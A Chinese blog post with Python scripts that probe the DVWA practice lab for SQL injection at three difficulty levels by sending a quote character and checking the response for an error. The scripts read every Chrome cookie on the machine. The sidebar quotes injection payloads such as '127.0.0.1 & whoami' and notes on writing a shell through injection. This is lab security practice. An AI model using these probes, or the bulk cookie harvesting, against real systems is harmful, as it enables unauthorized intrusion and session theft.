POC——DVWA‘s SQL Injection

已于 2022-06-10 15:45:33 修改
阅读量240 收藏 1
点赞数
分类专栏: POC 文章标签: python
于 2022-06-09 18:04:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45260839/article/details/125208503
版权

最近开始尝试着自己写一些POC,从基础的DVWA靶场开始吧,不定时更新~

Level——low:

import requests
import browser_cookie3

cookie = browser_cookie3.chrome()  //获得了chrome全部的访问过的cookie,以后看看有没有什么方法只获取当前的,而且这个方法好像只有chrome可以,firefox不太行
response = requests.get("http://192.168.117.133/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#",cookies=cookie)

re = 'syntax'
flag=re in str(response.content)

if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")

Level——Medium

 1 import requests
 2 import browser_cookie3
 3 
 4 cookie = browser_cookie3.chrome()
 5 datas = {"id":"1'","Submit":"Submit"}  //这里因为Content-Type:application/x-www-form-urlencoded,所以post构造为该模式(根据Payload内的值)
 6 response = requests.post("http://192.168.117.130/DVWA-1.9/vulnerabilities/sqli/?id=1'&Submit=Submit#",cookies=cookie,data=datas)
 7 
 8 re = 'syntax'
 9 flag=re in str(response.content)
10 
11 if flag:
12     print("It looks likely vulnerable")
13 else:
14     print("It is strong")

Level——High

 1 import requests
 2 import browser_cookie3
 3 
 4 cookie = browser_cookie3.chrome()
 5 datas = {"id":"1'","Submit":"Submit"}
 6 response1 = requests.post("http://192.168.117.130/DVWA-1.9/vulnerabilities/sqli/session-input.php",cookies=cookie,data=datas)
 7 response2 = requests.get("http://192.168.117.130/DVWA-1.9/vulnerabilities/sqli/",cookies=cookie)  //high中,查询和回显不在一个页面中,所以在这里分post查询和get获取页面
 8 
 9 re = 'wrong'  //这里换了特征语句
10 flag=re in str(response2.content)
11 
12 if flag:
13     print("It looks likely vulnerable")
14 else:
15     print("It is strong")
wavesky111
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sql注入pythonpoc_DVWA SQL-injection 附python脚本
weixin_39896256的博客
12-17 382
SQL-Injectionlow等级首先我们将dvwa等级调到low 如图接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2得到如上回显信息说明存在注入...
POC——DVWA‘s File Inclusion
weixin_45260839的博客
06-19 135
POC——DVWA's File Inclusion
POC——DVWA‘s File Upload
weixin_45260839的博客
06-17 177
POC——DVWA's File Upload
python编写的poc,以DVWA-command_injection为例
weixin_44248977的博客
10-03 150
一个简单的命令注入POC编写,用python实现,希望大佬们批评指正
poc练习-dvwa靶场sql注入(盲注)
qq_44248518的博客
02-24 281
dvwasql注入poc(Python)
houyusen#poc#天擎 前台SQL注入1
07-25
1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell 2. 通过注入点,创建一张表 O 3. 为 表O 添加一个新字段 T 并且写入she
瑞友天翼2024SQL注入漏洞poc
02-27
瑞友天翼2024SQL注入漏洞poc
Xsafe#PeiQi-WIKI-POC#天擎 前台SQL注入2
07-25
1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell 2. 通过注入点,创建一张表 O 3. 为 表O 添加一个新字段 T 并且写入she
houyusen#poc#XDCMS 3.0 后台友情链接sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
GMSL2 POC电路官方推荐型号
07-30
GMSL2 POC电路官方推荐型号 GMSL2(Generic Media Serial Link 2)是一种高速串行链接技术,广泛应用于车联网、自动驾驶、医疗设备、工业自动化等领域。POC(Power over Coax)是GMSL2的一种实现技术,能够提供高速...
poc练习-dvwa文件包含漏洞
qq_44248518的博客
02-24 153
poc练习-dvwa文件包含漏洞
DVWA大通关详解(持续更新)
世间繁华梦一出
11-25 4027
** LOW ** BRUTE Force(爆库) <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FRO
DVWA靶场通关
..
01-24 3240
Brute Force low等级: 先随便输一下账号密码,在bp抓包发送到intruder模块,先点击清除§。 然后选中下面admin和password的值,点击添加§,表明这是要爆破的点。 选择爆破模式集束炸弹(Clusterbomb),对于这几种模式的区别,可以看一下这篇博客。 burpsuite中intruder模块爆破的四种模式_liweibin812的博客-CSDN博客_burp intruder 模式 转到有效载荷(payload)这个界面,加.
【黑客编程】手把手教你编写POC
Zt_Zk的博客
08-26 4548
在安全界可以理解成漏洞验证程序,和一些应用程序相比,PoC 是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。
简单的Poc Exp编写(上)
dfdhxb995397的博客
05-26 1052
简单的POC EXP编写(上) 作者BY Greekn 今天主要讲的是关于web方面的poc编写 关于web安全个人理解的话 一个就是攻击另一个就是漏洞挖掘了防御的话看自己的经验了 攻击的话不管自己黑的漫天飞也是利用别人的工具或者漏洞罢了 这样只会攻击的话我们是学不会指哪打哪的所以我们就需要掌握漏洞...
DVWA—【命令执行】全级别
qq_34914659的博客
05-18 1290
1.DVWA-【命令执行】-low级别 命令执行功能此处是一个ping命令的提交框,应该是输入任意IP,执行后会进行ping命令操作 在执行ping命令时候,同时执行其他命令的操作。如输入 127.0.0.1 & whoami 可以发现在ping IP的时候,又进行了当前用户的查询。 2.DVWA-【命令执行】-medium级别 首先调整级别是中级,然后,我使用low级别的poc,发现可以命令执行,查看下源代码 查看源代码,发现中级别的将 && 和 ;替换为空
DVWA的练习总结(还在补充,待续)
qq_43695654的博客
06-07 846
Brute Force: 先从low开始,在DVWA Security中调整难度,默认打开是impossible。 low: 其实,这个的话,大家因该都会想到,直接爆破肯定能出来,但是还是看下代码,点击右下角的View Source查看当前难度下的源码。 像这种代码,其实都没必要全部弄懂的,只要把关键的部分看懂就行,不过我不怎么懂这些啊,PHP还没学,只知道一点。。。 咳咳,user和pass都是...
【GO-OpenCV】go-cv快速配置
最新发布
记录我的学习历程
06-16 1347
最近对golang实现目标检测心血来潮,尝试在没有sudo权限的平台配置go-cv,有所发现,索性多个平台都做尝试。
python迁移数据教程
2402_85292291的博客
06-13 643
if os.path.isfile(src_item_path): dest_item_path = os.path.join(dest_folder, item) shutil.copy2(src_item_path, dest_item_path) # 如果item是目录,递归调用migrate_data函数。2. 准备源文件夹和目标文件夹: 在您的计算机上创建两个文件夹,分别为源文件夹(source_folder)和目标文件夹(destination_folder)。将您希望迁移的数据放入源文件夹。
使用pocDVWA(security=low)进行sql注入和盲注攻击
07-12
以下是一个简单的POC(Proof of Concept)来对DVWA进行SQL注入和盲注攻击: 1. SQL注入攻击: ```python import requests # 设置目标URL和payload target_url = "http://dvwa.com/vulnerabilities/sqli/?id=" ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值